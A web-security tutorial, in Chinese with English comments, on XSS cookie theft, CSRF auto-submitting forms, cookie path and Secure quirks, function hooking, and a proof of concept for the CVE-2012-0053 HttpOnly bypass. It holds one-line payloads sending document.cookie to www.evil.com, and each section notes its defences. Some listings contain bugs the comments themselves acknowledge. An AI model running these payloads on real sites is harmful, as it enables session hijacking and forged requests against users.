一.模拟用户发起浏览器请求
1.1 GET方式,实际上就是一个URL
/*
 * Cookie exfiltration primitives as they appear in XSS payloads.
 * Both expressions read document.cookie and hand it to a third-party host,
 * one through an image request and one through a top-level navigation.
 * Defence: mark session cookies HttpOnly so document.cookie cannot see them,
 * and use a CSP (img-src, and a tight script-src to stop the injection itself)
 * so that injected script has nowhere to send data.
 */
new Image().src="http://www.evil.com/steal.php"+escape(document.cookie)
location.href="http://www.evil.com/steal.php"+escape(document.cookie)
1.2 POST请求
同步发送请求
/*
 * Synchronous XMLHttpRequest POST skeleton, first with a URL-encoded body and
 * then with a hand-built multipart body. Illustrative only: the listing is not
 * runnable as written.
 * The same-origin policy only hides responseText for a cross-origin target
 * that has not opted in via CORS; it does not stop the request being sent,
 * which is why the server-side defences matter.
 * Defence: CSP connect-src limits where page script may send XHR; SameSite
 * and HttpOnly cookies limit what an injected script can carry along.
 */
xhr=function(){
  var request=false;
  if(window.XMLHttpRequest){
    request=New XMLHttpRequest();
  } else if (window.ActiveXObject){
    // legacy IE fallback
    try{
      request=new window.ActiveXObject('Microsoft.XMLHTTP');
    } catch(e){ }
  }
  return request;
}();
request=function(method,src,argv,content_type){
  xhr.open(method,src,false); // synchronous mode
  if(method=='POST') xhr.setRequestHeader('Content-Type',content_type);
  xhr.send(argv);
  return xhr.responseText;
}
// Default (URL-encoded) form
attack_a=function(){
  var src="http://www.evil.com/steal.php";
  var argv_0="&name1=value1&name2=value2";
  request("POST",src,argv_0,"application/x-www-form-urlencoded"); // default form encoding
}
// File-upload (multipart) form. Assigning attack_a again replaces the
// URL-encoded version above, so only this variant remains callable.
attack_a=function(){
  var src="http://www.evil.com/steal.php";
  var name1="value1";
  var name2="value2";
  var argv_0="\r\n"; // body begins with a blank line (original note: the first line of the HTTP message header is blank)
  argv_0+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"name1\"\r\n\r\n"
  argv_0+=(name1+"\r\n");
  argv_0+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"name2\"\r\n\r\n"
  argv_0+=(name2+"\r\n");
  argv+="---------------------7964f8dddeb95fc5--\r\n"; // the closing delimiter ends in two dashes --, marking the end of the multipart body
  request("POST",src,argv_0,"multipart/form-data; boundary=-------------------7964f8dddeb95fc5");
}
Form表单自提交,常用于CSRF攻击中
/*
 * Self-submitting hidden form, the usual CSRF delivery vehicle.
 * A form is created, hidden inputs are appended, action is pointed at a
 * third-party URL and submit() fires a cookie-carrying POST with no user
 * interaction.
 * Defence: per-request anti-CSRF tokens validated server-side, SameSite
 * cookies, and Origin/Referer checks; nothing on the client side can be
 * relied on to stop this.
 */
function new_form(){
  var f=document.createElement("form");
  document.body.appendChild(f);
  f.method="post";
  return f;
}
function create_elements(eForm,eName,eValue) {
  var e=document.createElement("input");
  eForm.appendChild(e);
  e.type='text';
  e.name=eName;
  if(!document.all){
    e.style.display='none';
  } else{
    // presumably an old-IE branch (document.all present): keep the input but collapse it to 0x0
    e.style.display='block';
    e.style.width='0px';
    e.style.height='0px';
  }
  e.value=eValue;
  return e;
}
var _f=new_form(); // create the form object
create_elements(_f,"name1","value1"); // create the input elements inside the form
create_elements(_f,"name2","value2");
_f.action="http://www.evil.com/steal1.php"; // form submission URL
_f.submit(); // submit
二.Cookie机制
2.1子域Cookie机制,不同子域可以共享父域的Cookie
2.2路径Cookie机制,可以跨iframe跨路径读Cookie
/*
 * Reading cookies across a path boundary through a same-origin iframe.
 * The cookie "path" attribute is not a security boundary: a same-origin
 * document can frame a page under another path and read that frame's
 * document.cookie. Illustrative only; not runnable as written.
 * Defence: never rely on path scoping to isolate cookies; use HttpOnly for
 * session cookies and separate host names where isolation matters.
 */
xc=function(src){
  var o=document.createElement("iframe"); // iframe pointing at a same-origin target
  o.src=src;
  ducument.getElementsByTagName("body")[0].appendChild(o);
  o.onload=function(){ // after the iframe has finished loading
    d=o.contentDocument||o.contentWindow.document; // get the frame's document object
    alert(d.cookie); // read its cookies
  };
}('http://a.foo.com/admin/index.php');
<?php
// Two cookies: an ordinary one and one carrying the HttpOnly flag, which keeps it out of document.cookie.
// setcookie(name, value, expires, path, domain, secure, httponly)
// Note both pass secure=0, so they are also sent over plain HTTP.
setcookie("test",1,time()+3600,"","",0); // set an ordinary cookie
setcookie("test_http",1,time()+3600,"","",0,1); // last argument is the HttpOnly flag: 0 = off, 1 = on, default 0
?>
(1)php的phpinfo()信息会导致HttpOnly Cookie泄漏
(2)Django应用调试信息
(3)CVE-2012-0053 错误暴露HttpOnly Cookie
/*
 * Proof of concept for CVE-2012-0053 (HttpOnly bypass via the Apache 2.2.x
 * 400 error page). Ten oversized "xssN" filler cookies push the Cookie header
 * past LimitRequestFieldSize; the 400 response echoes the offending header
 * inside <pre>, so the script parses every cookie, HttpOnly ones included,
 * out of responseText and then expires the filler cookies again.
 * Defence: run a patched server and serve a custom ErrorDocument 400 that does
 * not reflect request headers. HttpOnly is only as strong as every server-side
 * path that might echo headers back to script.
 */
// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
  // Construct string for cookie value
  var str = "";
  for (var i=0; i< 819; i++) { str += "x"; }
  // Set cookies
  for (i = 0; i < 10; i++) {
    // Expire evil cookie
    if (good) { // clear the junk cookies
      var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
    }
    // Set evil cookie
    else { // add the junk cookies
      var cookie = "xss"+i+"="+str+";path=/";
    }
    document.cookie = cookie;
  }
}
function makeRequest() {
  setCookies();
  // Handler for the XHR below; `xhr` is a hoisted var, assigned before the request is sent.
  function parseCookies () {
    var cookie_dict = {};
    // Only react on 400 status
    if (xhr.readyState === 4 && xhr.status === 400) {
      // Replace newlines and match <pre> content
      var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
      if (content.length) {
        // Remove Cookie: prefix
        content = content[1].replace("Cookie: ", "");
        // Drop the filler cookies, then split the rest on ';'
        var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
        // Add cookies to object
        for (var i=0; i<cookies.length; i++) {
          var s_c = cookies[i].split('=',2);
          cookie_dict[s_c[0]] = s_c[1];
        }
      }
      // Unset malicious cookies
      setCookies(true);
      alert(JSON.stringify(cookie_dict));
    }
  }
  // Make XHR request
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = parseCookies;
  xhr.open("GET", "/", true);
  xhr.send(null);
}
makeRequest();
Apache HTTP Server 2.2.x 多个版本没有严格限制HTTP 请求头信息,HTTP 请求头信息超过LimitRequestFieldSize长度时,服务器返回400,并将出错的请求头内容输出
2.3 Secure Cookie机制
// Setting a cookie with the "secure" attribute from script. A cookie with the same
// name, path and domain replaces the existing one.
// Original note: path and domain must match, otherwise the browser treats it as a different cookie.
// Modern browsers refuse to set or overwrite a Secure cookie from a non-secure (http) origin,
// which closes this overwrite path; older browsers did not.
document.cookie="test_secure=hijack;path=/;secure;"
三.JavaScript函数劫持
// Function hijacking: keep a reference to the original eval and replace the global
// with a wrapper that shows each argument before delegating. The same hook shape can
// be used defensively to observe or block calls into dangerous sinks.
// Note: the wrapper ignores undefined input and does not return _eval's result.
var _eval=eval;
eval=function(x){
  if(typeof(x)=='undefined') {return;}
  alert(x);
  _eval(x);
}
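// Function hijacking of document.write, shown two ways.
// Variant 1: bind the original to document, then wrap it.
var _write=document.write.bind(document);
document.write=function(x){
  // Skip calls with no argument. The original compared against the misspelled
  // string 'underfined', so this guard could never fire; fixed to 'undefined'.
  if(typeof(x)=='undefined'){return;}
  _write(x);
};
// Variant 2: keep the unbound original and restore `this` with call().
// Because this runs after variant 1, _write now holds variant 1's wrapper,
// so variant 2 wraps variant 1 rather than the native document.write.
var _write=document.write;
document.write=function(x){
  if(typeof(x)=='undefined'){return;}
  _write.call(document,x);
};
// Exercise the hook chain.
document.write("<script>alert(1)</script>");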